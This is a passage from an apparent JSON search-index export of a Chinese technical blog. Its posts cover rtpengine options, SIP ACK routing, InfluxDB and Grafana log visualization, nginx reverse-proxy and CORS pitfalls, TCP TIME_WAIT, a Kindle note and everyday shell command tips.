log info **-p, \u0026ndash;pidfile=FILE ** Write PID to file **-f, \u0026ndash;foreground ** Don\u0026rsquo;t fork to background -t, \u0026ndash;table=INT Kernel table to use -F, \u0026ndash;no-fallback Only start when kernel module is available **-i, \u0026ndash;interface=[NAME/]IP[!IP] ** Local interface for RTP -k, \u0026ndash;subscribe-keyspace=INT INT \u0026hellip; Subscription keyspace list -l, \u0026ndash;listen-tcp=[IP:]PORT TCP port to listen on -u, \u0026ndash;listen-udp=[IP46|HOSTNAME:]PORT UDP port to listen on -n, \u0026ndash;listen-ng=[IP46|HOSTNAME:]PORT UDP port to listen on, NG protocol **-c, \u0026ndash;listen-cli=[IP46|HOSTNAME:]PORT ** UDP port to listen on, CLI -g, \u0026ndash;graphite=IP46|HOSTNAME:PORT Address of the graphite server -G, \u0026ndash;graphite-interval=INT Graphite send interval in seconds \u0026ndash;graphite-prefix=STRING Prefix for graphite line -T, \u0026ndash;tos=INT Default TOS value to set on streams \u0026ndash;control-tos=INT Default TOS value to set on control-ng -o, \u0026ndash;timeout=SECS RTP timeout -s, \u0026ndash;silent-timeout=SECS RTP timeout for muted -a, \u0026ndash;final-timeout=SECS Call timeout \u0026ndash;offer-timeout=SECS Timeout for incomplete one-sided calls **-m, \u0026ndash;port-min=INT ** Lowest port to use for RTP **-M, \u0026ndash;port-max=INT ** Highest port to use for RTP -r, \u0026ndash;redis=[PW@]IP:PORT/INT Connect to Redis database -w, \u0026ndash;redis-write=[PW@]IP:PORT/INT Connect to Redis write database \u0026ndash;redis-num-threads=INT Number of Redis restore threads \u0026ndash;redis-expires=INT Expire time in seconds for redis keys -q, \u0026ndash;no-redis-required Start no matter of redis connection state \u0026ndash;redis-allowed-errors=INT Number of allowed errors before redis is temporarily disabled \u0026ndash;redis-disable-time=INT Number of seconds redis communication is disabled because of errors \u0026ndash;redis-cmd-timeout=INT Sets a timeout in milliseconds for redis commands \u0026ndash;redis-connect-timeout=INT Sets a timeout in milliseconds for redis connections -b, \u0026ndash;b2b-url=STRING XMLRPC URL of B2B UA \u0026ndash;log-facility-cdr=daemon|local0|\u0026hellip;|local7 Syslog facility to use for logging CDRs \u0026ndash;log-facility-rtcp=daemon|local0|\u0026hellip;|local7 Syslog facility to use for logging RTCP \u0026ndash;log-facility-dtmf=daemon|local0|\u0026hellip;|local7 Syslog facility to use for logging DTMF \u0026ndash;log-format=default|parsable Log prefix format \u0026ndash;dtmf-log-dest=IP46|HOSTNAME:PORT Destination address for DTMF logging via UDP -x, \u0026ndash;xmlrpc-format=INT XMLRPC timeout request format to use. 0: SEMS DI, 1: call-id only, 2: Kamailio \u0026ndash;num-threads=INT Number of worker threads to create \u0026ndash;media-num-threads=INT Number of worker threads for media playback -d, \u0026ndash;delete-delay=INT Delay for deleting a session from memory. \u0026ndash;sip-source Use SIP source address by default \u0026ndash;dtls-passive Always prefer DTLS passive role \u0026ndash;max-sessions=INT Limit of maximum number of sessions \u0026ndash;max-load=FLOAT Reject new sessions if load averages exceeds this value \u0026ndash;max-cpu=FLOAT Reject new sessions if CPU usage (in percent) exceeds this value \u0026ndash;max-bandwidth=INT Reject new sessions if bandwidth usage (in bytes per second) exceeds this value \u0026ndash;homer=IP46|HOSTNAME:PORT Address of Homer server for RTCP stats \u0026ndash;homer-protocol=udp|tcp Transport protocol for Homer (default udp) \u0026ndash;homer-id=INT \u0026lsquo;Capture ID\u0026rsquo; to use within the HEP protocol \u0026ndash;recording-dir=FILE Directory for storing pcap and metadata files \u0026ndash;recording-method=pcap|proc Strategy for call recording \u0026ndash;recording-format=raw|eth File format for stored pcap files \u0026ndash;iptables-chain=STRING Add explicit firewall rules to this iptables chain \u0026ndash;codecs Print a list of supported codecs and exit \u0026ndash;scheduling=default|none|fifo|rr|other|batch|idle Thread scheduling policy \u0026ndash;priority=INT Thread scheduling priority \u0026ndash;idle-scheduling=default|none|fifo|rr|other|batch|idle Idle thread scheduling policy \u0026ndash;idle-priority=INT Idle thread scheduling priority \u0026ndash;log-srtp-keys Log SRTP keys to error log \u0026ndash;mysql-host=HOST|IP MySQL host for stored media files \u0026ndash;mysql-port=INT MySQL port \u0026ndash;mysql-user=USERNAME MySQL connection credentials \u0026ndash;mysql-pass=PASSWORD MySQL connection credentials \u0026ndash;mysql-query=STRING MySQL select query \u0026ndash;endpoint-learning=delayed|immediate|off|heuristic RTP endpoint learning algorithm \u0026ndash;jitter-buffer=INT Size of jitter buffer \u0026ndash;jb-clock-drift Compensate for source clock drift 参考 https://github.com/sipwise/rtpengine ","permalink":"https://wdd.js.org/opensips/ch9/rtpengine-manu/","summary":"帮助文档 Usage: rtpengine [OPTION...] - next-generation media proxy Application Options: -v, \u0026ndash;version Print build time and exit \u0026ndash;config-file=FILE Load config from this file \u0026ndash;config-section=STRING Config file section to use \u0026ndash;log-facility=daemon|local0|\u0026hellip;|local7 Syslog facility to use for logging **-L, \u0026ndash;log-level=INT ** Mask log priorities above this level 取值从0-7, 7 debug 6 info 5 notice **-E, \u0026ndash;log-stderr ** Log on stderr instead of syslog \u0026ndash;no-log-timestamps Drop timestamps from log lines to stderr \u0026ndash;log-mark-prefix Prefix for sensitive log info \u0026ndash;log-mark-suffix Suffix for sensitive log info **-p, \u0026ndash;pidfile=FILE ** Write PID to file **-f, \u0026ndash;foreground ** Don\u0026rsquo;t fork to background -t, \u0026ndash;table=INT Kernel table to use -F, \u0026ndash;no-fallback Only start when kernel module is available **-i, \u0026ndash;interface=[NAME/]IP[!","title":"rtpengine"},{"content":"ACK的特点 ACK仅用于对INVITE消息的最终响应进行确认 ACK的CSeq的号码必须和INVITE的CSeq号码相同,这是用来保证ACK对对哪一个INVITE进行确认的唯一标志。另外CSeq的方法会改为ACK ACK分为两种 失败请求的确认;例如对4XX, 5XX请求的确认。在对失败的请求进行确认时,ACK是逐跳的。 成功的请求的确认;对200的确认,此时ACK是端到端的。 ACK一般不会带有SDP信息。如果INVITE消息没有带有SDP,那么ACK消息中一般会带有ACK ACK与事务的关系 如果请求成功,那么后续的ACK消息是单独的事物 如果请求失败,那么后续的ACK消息和之前的INVITE是属于相同的事务 逐跳ACK VS 端到端ACK 逐跳在英文中叫做: hop-by-hop端到端在英文中叫做:end-to-end\nACK如何路由 ack是序列化请求,所谓序列化请求,是指sip to 字段中已经有tag。有to tag是到达对端的唯一标志。\n没有to tag请求称为初始化请求,有totag称为序列化请求。\n初始化请求做路径发现,往往需要做一些数据库查询,DNS查询。而序列化请求不需要查询数据库,因为路径已经发现过了。\n实战场景:分机A, SIP服务器S, 分机B, A呼叫B,详细介绍一下到ACK的过程。\n分机A向SIP服务器S发送请求:INVITE B SIP服务器 首先在数据库中查找B的实际注册地址 修改Contact头为分机A的外网地址和端口。因为由于存在NAT, 分机A一般不知道自己的公网地址。 record_route 将消息发送给B 分机B: 收到来自SIP服务器的INVITE消息 从INVITE中取出Contact, 获取对端的,其实也就是分机A的实际地址 如果所有条件都满足,分机B会向SIP服务器发送180响应,然后发送200响应 由于180响应和200响应和INVITE都属于一个事务,响应会按照Via的地址,先发送给SIP服务器 SIP服务器: SIP服务器会首先修改180响应的Contac头,把分机B的内网地址改为外网地址 SIP服务器根据Via头,将消息发送给分机A 对于200 OK的消息,和180的处理是相同的 分机A: 分机收到180消息后,从Contact头中能够获取分机B的外网地址 分机A在发送ACK时,request url地址是分机B的地址,但是由于sip服务器的record_route动作首先会将消息发送给SIP服务器,SIP服务器会按照request url的地址,将ack发送给分机B。 ACK的路由不需要做数据库查询,ACK的request url一般是对端UAC的地址。在存在route头时,ACK会按照route字段去路由。\nACK丢失了会怎样? 如果被叫在一定时间内没有收到ACK, 那么被叫会周期性的重发200OK。如果在超时的时候,还没有收到ACK, 就发发送BYE消息来挂断呼叫。很多呼叫在30秒自动挂断,往往就是因为丢失了ACK。\n那么ACK为什么会丢失呢?可能有以下的原因,大部分原因和NAT有关!\nSIP服务器没有做fix_nat_contact, 导致主叫可能不知道实际被叫的外网地址 ACK与媒体流的关系 并不是说被叫收到ACK后,媒体流才开始。往往在180或者183时,双方已经能够听到对方的声音了。\n","permalink":"https://wdd.js.org/opensips/ch1/sip-ack/","summary":"ACK的特点 ACK仅用于对INVITE消息的最终响应进行确认 ACK的CSeq的号码必须和INVITE的CSeq号码相同,这是用来保证ACK对对哪一个INVITE进行确认的唯一标志。另外CSeq的方法会改为ACK ACK分为两种 失败请求的确认;例如对4XX, 5XX请求的确认。在对失败的请求进行确认时,ACK是逐跳的。 成功的请求的确认;对200的确认,此时ACK是端到端的。 ACK一般不会带有SDP信息。如果INVITE消息没有带有SDP,那么ACK消息中一般会带有ACK ACK与事务的关系 如果请求成功,那么后续的ACK消息是单独的事物 如果请求失败,那么后续的ACK消息和之前的INVITE是属于相同的事务 逐跳ACK VS 端到端ACK 逐跳在英文中叫做: hop-by-hop端到端在英文中叫做:end-to-end\nACK如何路由 ack是序列化请求,所谓序列化请求,是指sip to 字段中已经有tag。有to tag是到达对端的唯一标志。\n没有to tag请求称为初始化请求,有totag称为序列化请求。\n初始化请求做路径发现,往往需要做一些数据库查询,DNS查询。而序列化请求不需要查询数据库,因为路径已经发现过了。\n实战场景:分机A, SIP服务器S, 分机B, A呼叫B,详细介绍一下到ACK的过程。\n分机A向SIP服务器S发送请求:INVITE B SIP服务器 首先在数据库中查找B的实际注册地址 修改Contact头为分机A的外网地址和端口。因为由于存在NAT, 分机A一般不知道自己的公网地址。 record_route 将消息发送给B 分机B: 收到来自SIP服务器的INVITE消息 从INVITE中取出Contact, 获取对端的,其实也就是分机A的实际地址 如果所有条件都满足,分机B会向SIP服务器发送180响应,然后发送200响应 由于180响应和200响应和INVITE都属于一个事务,响应会按照Via的地址,先发送给SIP服务器 SIP服务器: SIP服务器会首先修改180响应的Contac头,把分机B的内网地址改为外网地址 SIP服务器根据Via头,将消息发送给分机A 对于200 OK的消息,和180的处理是相同的 分机A: 分机收到180消息后,从Contact头中能够获取分机B的外网地址 分机A在发送ACK时,request url地址是分机B的地址,但是由于sip服务器的record_route动作首先会将消息发送给SIP服务器,SIP服务器会按照request url的地址,将ack发送给分机B。 ACK的路由不需要做数据库查询,ACK的request url一般是对端UAC的地址。在存在route头时,ACK会按照route字段去路由。\nACK丢失了会怎样? 如果被叫在一定时间内没有收到ACK, 那么被叫会周期性的重发200OK。如果在超时的时候,还没有收到ACK, 就发发送BYE消息来挂断呼叫。很多呼叫在30秒自动挂断,往往就是因为丢失了ACK。\n那么ACK为什么会丢失呢?可能有以下的原因,大部分原因和NAT有关!\nSIP服务器没有做fix_nat_contact, 导致主叫可能不知道实际被叫的外网地址 ACK与媒体流的关系 并不是说被叫收到ACK后,媒体流才开始。往往在180或者183时,双方已经能够听到对方的声音了。","title":"深入理解SIP ACK 方法"},{"content":"数据规整 我的数据来源一般都是来自于日志文件,不同的日志文件格式可能都不相同。所以第一步就是把数据抽取出来,并且格式化。\n一般情况下我会用grep或者awk进行初步的整理。如果shell脚本处理不太方便,通常我会写个js脚本。\nNode.js的readline可以实现按行取出。处理过后的输出依然是写文件。\nconst readline = require(\u0026#39;readline\u0026#39;) const fs = require(\u0026#39;fs\u0026#39;) const dayjs = require(\u0026#39;dayjs\u0026#39;) const fileName = \u0026#39;data.log\u0026#39; const batch = dayjs().format(\u0026#39;MMDDHHmmss\u0026#39;) const dist = fs.createWriteStream(`${fileName}.out`) const rl = readline.createInterface({ input: fs.createReadStream(fileName) }) rl.on(\u0026#39;line\u0026#39;, handlerLine) function handlerLine (line) { let info = line.split(\u0026#39; \u0026#39;) let time = dayjs(`2020-${info[0]} ${info[1]}`).valueOf() let log = `rtpproxy,tag=b${batch} socket=${info[2]},mem=${info[3]} ${time}000000\\n` console.log(log) dist.write(log) } 输出的文件格式如下,至于为什么是这种格式,且看下文分晓。\nrtpproxy,tag=b0216014954 socket=691,mem=3106936 1581477499000000000 rtpproxy,tag=b0216014954 socket=615,mem=3109328 1581477648000000000 rtpproxy,tag=b0216014954 socket=669,mem=3113764 1581477901000000000 rtpproxy,tag=b0216014954 socket=701,mem=3114820 1581477961000000000 数据导入 以前我都会把数据规整后的输出写成一个JSON文件,然后写html页面,引入Echarts库,进行数据可视化。\n但是这种方式过于繁琐,每次都要写个Echars的Options。\n所以我想,如果把数据写入influxdb,然后用grafana去做可视化,那岂不是十分方便。\n所以,我们要把数据导入influxdb。\n启动influxdb grafana 下面是一个Makefile, 用来启动容器。\nmake create-network 用来创建两个容器的网络,这样grafana就可以通过容器名访问influxdb了。 make run-influxdb 启动influxdb,其中8086端口是influxdb对外提供服务的端口 make run-grafana 启动grafana, 其中3000端口是grafana对外提供服务的端口 run-influxdb: docker run -d -p 8083:8083 -p 8086:8086 --network b2 --name influxdb influxdb:latest run-grafana: docker run -d --name grafana --network b2 -p 3000:3000 grafana/grafana create-network: docker network create -d bridge --ip-range=192.168.1.0/24 --gateway=192.168.1.1 --subnet=192.168.1.0/24 b2 接着你打开localhost:3000端口,输入默认的用户名密码 admin/amdin来登录\n创建默认的数据库\n进入influxb的容器中创建数据库\ndocker exec -it influxdb bash influx create database mydb grafana中添加influxdb数据源\n使用curl上传数据到influxdb\ncurl -i -XPOST \u0026#34;http://localhost:8086/write?db=mydb\u0026#34; --data-binary @data.log.out grafana上添加dashboard 结论 通过使用influxb来存储数据,grafana来做可视化。每次需要分析的时候,我需要做的仅仅只是写个脚本去规整数据,这样就大大提供了分析效率。\n","permalink":"https://wdd.js.org/posts/2020/02/mrgkvf/","summary":"数据规整 我的数据来源一般都是来自于日志文件,不同的日志文件格式可能都不相同。所以第一步就是把数据抽取出来,并且格式化。\n一般情况下我会用grep或者awk进行初步的整理。如果shell脚本处理不太方便,通常我会写个js脚本。\nNode.js的readline可以实现按行取出。处理过后的输出依然是写文件。\nconst readline = require(\u0026#39;readline\u0026#39;) const fs = require(\u0026#39;fs\u0026#39;) const dayjs = require(\u0026#39;dayjs\u0026#39;) const fileName = \u0026#39;data.log\u0026#39; const batch = dayjs().format(\u0026#39;MMDDHHmmss\u0026#39;) const dist = fs.createWriteStream(`${fileName}.out`) const rl = readline.createInterface({ input: fs.createReadStream(fileName) }) rl.on(\u0026#39;line\u0026#39;, handlerLine) function handlerLine (line) { let info = line.split(\u0026#39; \u0026#39;) let time = dayjs(`2020-${info[0]} ${info[1]}`).valueOf() let log = `rtpproxy,tag=b${batch} socket=${info[2]},mem=${info[3]} ${time}000000\\n` console.log(log) dist.write(log) } 输出的文件格式如下,至于为什么是这种格式,且看下文分晓。\nrtpproxy,tag=b0216014954 socket=691,mem=3106936 1581477499000000000 rtpproxy,tag=b0216014954 socket=615,mem=3109328 1581477648000000000 rtpproxy,tag=b0216014954 socket=669,mem=3113764 1581477901000000000 rtpproxy,tag=b0216014954 socket=701,mem=3114820 1581477961000000000 数据导入 以前我都会把数据规整后的输出写成一个JSON文件,然后写html页面,引入Echarts库,进行数据可视化。","title":"我的数据可视化处理过程"},{"content":"特征维度 特征项 集中 无规律 周期性 时间 集中在某个时间点发生 按固定时间间隔发生 空间 集中在某个空间发生 人物 集中在某个人物身上发生 ","permalink":"https://wdd.js.org/posts/2020/02/rx59i2/","summary":"特征维度 特征项 集中 无规律 周期性 时间 集中在某个时间点发生 按固定时间间隔发生 空间 集中在某个空间发生 人物 集中在某个人物身上发生 ","title":"故障的特征分析方法"},{"content":"下文的论述都以下面的配置为例子\nlocation ^~ /p/security { rewrite /p/security/(.*) /security/$1 break; proxy_pass http://security:8080; proxy_redirect off; proxy_set_header Host $host; add_header \u0026#39;Access-Control-Allow-Origin\u0026#39; \u0026#39;*\u0026#39; always; add_header \u0026#39;Access-Control-Allow-Credentials\u0026#39; \u0026#39;true\u0026#39; always; } 如果dns无法解析,nginx则无法启动 security如果无法解析,那么nginx则无法启动 DNS缓存问题: nginx启动时,如果将security dns解析为1.2.3.4。如果security的ip地址变了。nginx不会自动解析新的ip地址,导致反向代理报错504。 反向代理的DNS缓存问题务必重视 跨域头配置的always 反向代理一般都是希望允许跨域的。如果不加always,那么只会对成功的请求加跨域头,失败的请求则不会。 关于**\u0026lsquo;Access-Control-Allow-Origin\u0026rsquo; \u0026lsquo;*\u0026rsquo;,如果后端服务本身就带有这个头,那么如果你在nginx中再添加这个头,就会在浏览器中遇到下面的报错。而解决办法就是不要在nginx中设置这个头。**\nAccess to fetch at \u0026#39;http://192.168.40.107:31088/p/security/v2/login\u0026#39; from origin \u0026#39;http://localhost:5000\u0026#39; has been blocked by CORS policy: Response to preflight request doesn\u0026#39;t pass access control check: The \u0026#39;Access-Control-Allow-Origin\u0026#39; header contains multiple values \u0026#39;*, *\u0026#39;, but only one is allowed. Have the server send the header with a valid value, or, if an opaque response serves your needs, set the request\u0026#39;s mode to \u0026#39;no-cors\u0026#39; to fetch the resource with CORS disabled. 参考链接 http://nginx.org/en/docs/http/ngx_http_headers_module.html http://www.hxs.biz/html/20180425122255.html https://blog.csdn.net/xiojing825/article/details/83383524 https://cloud.tencent.com/developer/article/1470375 https://blog.csdn.net/bbg221/article/details/79886979 ","permalink":"https://wdd.js.org/posts/2020/02/ngse8g/","summary":"下文的论述都以下面的配置为例子\nlocation ^~ /p/security { rewrite /p/security/(.*) /security/$1 break; proxy_pass http://security:8080; proxy_redirect off; proxy_set_header Host $host; add_header \u0026#39;Access-Control-Allow-Origin\u0026#39; \u0026#39;*\u0026#39; always; add_header \u0026#39;Access-Control-Allow-Credentials\u0026#39; \u0026#39;true\u0026#39; always; } 如果dns无法解析,nginx则无法启动 security如果无法解析,那么nginx则无法启动 DNS缓存问题: nginx启动时,如果将security dns解析为1.2.3.4。如果security的ip地址变了。nginx不会自动解析新的ip地址,导致反向代理报错504。 反向代理的DNS缓存问题务必重视 跨域头配置的always 反向代理一般都是希望允许跨域的。如果不加always,那么只会对成功的请求加跨域头,失败的请求则不会。 关于**\u0026lsquo;Access-Control-Allow-Origin\u0026rsquo; \u0026lsquo;*\u0026rsquo;,如果后端服务本身就带有这个头,那么如果你在nginx中再添加这个头,就会在浏览器中遇到下面的报错。而解决办法就是不要在nginx中设置这个头。**\nAccess to fetch at \u0026#39;http://192.168.40.107:31088/p/security/v2/login\u0026#39; from origin \u0026#39;http://localhost:5000\u0026#39; has been blocked by CORS policy: Response to preflight request doesn\u0026#39;t pass access control check: The \u0026#39;Access-Control-Allow-Origin\u0026#39; header contains multiple values \u0026#39;*, *\u0026#39;, but only one is allowed.","title":"我走过的nginx反向代理的坑"},{"content":"2018年1月26日,我在京东上买了一个Kindle Paperwhite, 距离今天,大概已经2年多一点了。\n我是一个重度读者,每天都会花上一些时间去阅读。最近两天发现,本来可以连续两周不用充电的kindle。基本上现在是电量以每天50%的速度减少。或许,2年,就是kindle的寿命。\n刚开始读书总觉得没有什么进度,后来我就喜欢把每天读书的进度给记录下来。这样做的好处是能够督促我不要偷懒,\n我读书有个习惯,每天以至少1%的进度去读一本书,并且我会将进度记录下来。基本上,我每天会读7-8本书的1%。\n两年时间内我读过的书,要比我从小学到大学读过的书都要多。\n","permalink":"https://wdd.js.org/posts/2020/02/amkcs2/","summary":"2018年1月26日,我在京东上买了一个Kindle Paperwhite, 距离今天,大概已经2年多一点了。\n我是一个重度读者,每天都会花上一些时间去阅读。最近两天发现,本来可以连续两周不用充电的kindle。基本上现在是电量以每天50%的速度减少。或许,2年,就是kindle的寿命。\n刚开始读书总觉得没有什么进度,后来我就喜欢把每天读书的进度给记录下来。这样做的好处是能够督促我不要偷懒,\n我读书有个习惯,每天以至少1%的进度去读一本书,并且我会将进度记录下来。基本上,我每天会读7-8本书的1%。\n两年时间内我读过的书,要比我从小学到大学读过的书都要多。","title":"kindle阅读器的寿命"},{"content":"在事务结束之后,仍然保持在打开状态的链接称为持久连接。非持久的链接会在每个事务结束之后就会关闭。\n持久连接的好处 避免缓慢的链接建立阶段 避免慢启动的拥塞适应阶段 Keep-Alive 客户端发起请求,带有Connection: Keep-Alive头。客户端在响应头中回应Connection: Keep-Alive。则说明客户端同意持久连接。\n如果客户端不同意持久连接,就会在响应头中返回Connection: Close\n注意事项\n即使服务端同意了持久连接,服务端也可以随时关闭连接 HTTP 1.0 协议,必须显式传递Connection: Keep-Alive,服务端才会激活持久连接 HTTP 1.1 协议,默认就是持久连接 在通信双方中,主动关闭连接的一方会进入TIME_WIAT状态,而被动关闭的一方则不会进入该状态。\nTIME_WAIT连接太多 服务端太多的TIME_WAIT连接,则说明连接是服务端主动去关闭的。查看了响应头,内容也是Connection: Close。\n我们知道,一般情况下TIME_WAIT状态的链接至少会持续60秒。也就是说该连接占用的内存至少在60秒内不会释放。\n当连接太多时,就有可能产生out of memory的问题,而操作系统就会很有可能把这个进程给kill掉,进而导致服务不可用。\n","permalink":"https://wdd.js.org/network/sq4l53/","summary":"在事务结束之后,仍然保持在打开状态的链接称为持久连接。非持久的链接会在每个事务结束之后就会关闭。\n持久连接的好处 避免缓慢的链接建立阶段 避免慢启动的拥塞适应阶段 Keep-Alive 客户端发起请求,带有Connection: Keep-Alive头。客户端在响应头中回应Connection: Keep-Alive。则说明客户端同意持久连接。\n如果客户端不同意持久连接,就会在响应头中返回Connection: Close\n注意事项\n即使服务端同意了持久连接,服务端也可以随时关闭连接 HTTP 1.0 协议,必须显式传递Connection: Keep-Alive,服务端才会激活持久连接 HTTP 1.1 协议,默认就是持久连接 在通信双方中,主动关闭连接的一方会进入TIME_WIAT状态,而被动关闭的一方则不会进入该状态。\nTIME_WAIT连接太多 服务端太多的TIME_WAIT连接,则说明连接是服务端主动去关闭的。查看了响应头,内容也是Connection: Close。\n我们知道,一般情况下TIME_WAIT状态的链接至少会持续60秒。也就是说该连接占用的内存至少在60秒内不会释放。\n当连接太多时,就有可能产生out of memory的问题,而操作系统就会很有可能把这个进程给kill掉,进而导致服务不可用。","title":"TIME_WAIT与持久连接"},{"content":"最早听说“三过家门而不入”,是说禹治水大公无私,路过家门都没有回家。\n最近看到史记,发现这句话原本是\n禹伤先人父鲧(发音和滚相同)功之不成受诛,乃劳身焦思,居外十三年,过家门不敢入\n\u0026ldquo;三过家门而不入\u0026quot;这个短语中, 与原文少一个“敢”字,少了一个字,含义差距很大。\n没有敢字,说明是自己主动的。加上敢字,则会让人思考。禹为什么不敢回家?他在怕什么呢?\n这里就需要提到禹的父亲鲧。\n鲧治水九年,没有把水治理好。在舜巡视的时候,被赐死在羽山。\n舜登用,摄行天子之政,巡狩。行视鲧之治水无状,乃殛(发音和即相同)鲧于羽山以死\n所以,如果禹治不好水,你想禹的下场是什么?\n","permalink":"https://wdd.js.org/posts/2020/01/encss4/","summary":"最早听说“三过家门而不入”,是说禹治水大公无私,路过家门都没有回家。\n最近看到史记,发现这句话原本是\n禹伤先人父鲧(发音和滚相同)功之不成受诛,乃劳身焦思,居外十三年,过家门不敢入\n\u0026ldquo;三过家门而不入\u0026quot;这个短语中, 与原文少一个“敢”字,少了一个字,含义差距很大。\n没有敢字,说明是自己主动的。加上敢字,则会让人思考。禹为什么不敢回家?他在怕什么呢?\n这里就需要提到禹的父亲鲧。\n鲧治水九年,没有把水治理好。在舜巡视的时候,被赐死在羽山。\n舜登用,摄行天子之政,巡狩。行视鲧之治水无状,乃殛(发音和即相同)鲧于羽山以死\n所以,如果禹治不好水,你想禹的下场是什么?","title":"论禹三过家门而不入的真实原因"},{"content":"在《tcp/ip详解卷一》中,有幅图介绍了TCP的状态迁移,TCP的状态转移并不简单,我们本次重点关注TIME_WAIT状态。\nTIME-WAIT 主机1发起FIN关闭连接请求,主机2发送ACK确认,然后也发送FIN。主机1在收到FIN之后,想主机2发送了ACK。\n在主机1发送ACK时,主机1就进入了TIME-WAIT状态。\n主动发起关闭连接的一方会有TIME-WAIT状态 如果两方同时发起关闭连接请求,那么两方都会进入TIME-WAIT状态 TIME-WAIT的时长在 /proc/sys/net/ipv4/tcp_fin_timeout 中配置,一般是60s 为什么要有TIME-WAIT状态? 太多TIME-WAIT链接是否意味有故障? ","permalink":"https://wdd.js.org/network/yoc1k0/","summary":"在《tcp/ip详解卷一》中,有幅图介绍了TCP的状态迁移,TCP的状态转移并不简单,我们本次重点关注TIME_WAIT状态。\nTIME-WAIT 主机1发起FIN关闭连接请求,主机2发送ACK确认,然后也发送FIN。主机1在收到FIN之后,想主机2发送了ACK。\n在主机1发送ACK时,主机1就进入了TIME-WAIT状态。\n主动发起关闭连接的一方会有TIME-WAIT状态 如果两方同时发起关闭连接请求,那么两方都会进入TIME-WAIT状态 TIME-WAIT的时长在 /proc/sys/net/ipv4/tcp_fin_timeout 中配置,一般是60s 为什么要有TIME-WAIT状态? 太多TIME-WAIT链接是否意味有故障? ","title":"漫话TCP TIME-WAIT状态【ing】"},{"content":"命令行编辑 向左移动光标\tctrl + b 向右移动光标\tctrl + f 移动光标到行尾\tctrl + e 移动光标到行首\tctrl + a 清除前面一个词\tctrl + w 清除光标到行首\tctrl + u 清除光标到行尾\tctrl + k 命令行搜索\tctrl + r 解压与压缩 1、压缩命令: 命令格式:\ntar -zcvf 压缩文件名 .tar.gz 被压缩文件名 可先切换到当前目录下,压缩文件名和被压缩文件名都可加入路径。\n2、解压缩命令: 命令格式:\ntar -zxvf 压缩文件名.tar.gz 解压缩后的文件只能放在当前的目录。\ncrontab 每隔x秒执行一次 每隔5秒\n* * * * * for i in {1..12}; do /bin/cmd -arg1 ; sleep 5; done 每隔15秒\n* * * * * /bin/cmd -arg1 * * * * * sleep 15; /bin/cmd -arg1 * * * * * sleep 30; /bin/cmd -arg1 * * * * * sleep 45; /bin/cmd -arg1 awk从第二行开始读取 awk \u0026#39;NR\u0026gt;2{print $1}\u0026#39; 查找大文件,并清空文件内容 find /var/log -type f -size +1M -exec truncate --size 0 \u0026#39;{}\u0026#39; \u0026#39;;\u0026#39; switch case 语句 echo \u0026#39;Input a number between 1 to 4\u0026#39; echo \u0026#39;Your number is:\\c\u0026#39; read aNum case $aNum in 1) echo \u0026#39;You select 1\u0026#39; ;; 2) echo \u0026#39;You select 2\u0026#39; ;; 3) echo \u0026#39;You select 3\u0026#39; ;; 4) echo \u0026#39;You select 4\u0026#39; ;; *) echo \u0026#39;You do not select a number between 1 to 4\u0026#39; ;; esac 以$开头的特殊变量 echo $$ # 进程pid echo $# # 收到的参数个数 echo $@ # 列表方式的参数 $1 $2 $3 echo $? # 上个进程的退出码 echo $* # 类似列表方式,但是参数被当做一个实体, \u0026#34;$1c$2c$3\u0026#34; c是IFS的第一个字符 echo $0 # 脚本名 echo $1 $2 $3 # 第一、第二、第三个参数 for i in $@ do echo $i done for j in $@ do echo $j done 判断git仓库是否clean check_is_repo_clean () { if [ -n \u0026#34;$(git status --porcelain)\u0026#34; ]; then echo \u0026#34;Working directory is not clean\u0026#34; exit 1 fi } 文件批处理 for in循环 for f in *.txt; do mv $f $f.gz; done for d in *.gz; do gunzip $d; done shell 重定向到/dev/null ls \u0026amp;\u0026gt;/dev/null; #标准错误和标准输出都不想看 ls 1\u0026gt;/dev/null; #不想看标准输出 ls 2\u0026gt;/dev/null; 标准错误不想看 sed: -e expression #1, char 21: unknown option to `s' 出现这个问题,一般是要替换的字符串中也有/符号,所以要把分隔符改成 ! 或者 |\nsed -i \u0026#34;s!WJ_CONF_URL!$WJ_CONF_URL!g\u0026#34; file.txt 发送UDP消息 在shell是bash的时候, 可以使用 echo 或者 cat将内容重定向到 /dev/udp/ip/port中,来发送udp消息\necho \u0026#34;hello\u0026#34; \u0026gt; /dev/udp/192.168.1.1/8000 grep排除自身 下面查找名称包括rtpproxy的进程,grep出来找到这个进程外,还找到了grep这条语句的进程,一般来说,这个进程是多余的。\n➜ ~ ps aux | grep rtpproxy root 3353 0.3 0.0 186080 968 ? Sl 2019 250:05 rtpproxy -f -l root 31440 0.0 0.0 112672 980 pts/0 S+ 10:12 0:00 grep --color=auto --exclude-dir=.bzr --exclude-dir=CVS --exclude-dir=.git --exclude-dir=.hg --exclude-dir=.svn rtpproxy 但是,如果我们用中括号,将搜索关键词的第一个字符包裹起来,就可以排除grep自身。\n[root@localhost ~]# ps aux | grep \u0026#39;[r]tpproxy\u0026#39; root 3353 0.3 0.0 186080 968 ? Sl 2019 250:06 rtpproxy -f -l ","permalink":"https://wdd.js.org/shell/all-in-one/","summary":"命令行编辑 向左移动光标\tctrl + b 向右移动光标\tctrl + f 移动光标到行尾\tctrl + e 移动光标到行首\tctrl + a 清除前面一个词\tctrl + w 清除光标到行首\tctrl + u 清除光标到行尾\tctrl + k 命令行搜索\tctrl + r 解压与压缩 1、压缩命令: 命令格式:\ntar -zcvf 压缩文件名 .tar.gz 被压缩文件名 可先切换到当前目录下,压缩文件名和被压缩文件名都可加入路径。\n2、解压缩命令: 命令格式:\ntar -zxvf 压缩文件名.tar.gz 解压缩后的文件只能放在当前的目录。\ncrontab 每隔x秒执行一次 每隔5秒\n* * * * * for i in {1..12}; do /bin/cmd -arg1 ; sleep 5; done 每隔15秒\n* * * * * /bin/cmd -arg1 * * * * * sleep 15; /bin/cmd -arg1 * * * * * sleep 30; /bin/cmd -arg1 * * * * * sleep 45; /bin/cmd -arg1 awk从第二行开始读取 awk \u0026#39;NR\u0026gt;2{print $1}\u0026#39; 查找大文件,并清空文件内容 find /var/log -type f -size +1M -exec truncate --size 0 \u0026#39;{}\u0026#39; \u0026#39;;\u0026#39; switch case 语句 echo \u0026#39;Input a number between 1 to 4\u0026#39; echo \u0026#39;Your number is:\\c\u0026#39; read aNum case $aNum in 1) echo \u0026#39;You select 1\u0026#39; ;; 2) echo \u0026#39;You select 2\u0026#39; ;; 3) echo \u0026#39;You select 3\u0026#39; ;; 4) echo \u0026#39;You select 4\u0026#39; ;; *) echo \u0026#39;You do not select a number between 1 to 4\u0026#39; ;; esac 以$开头的特殊变量 echo $$ # 进程pid echo $# # 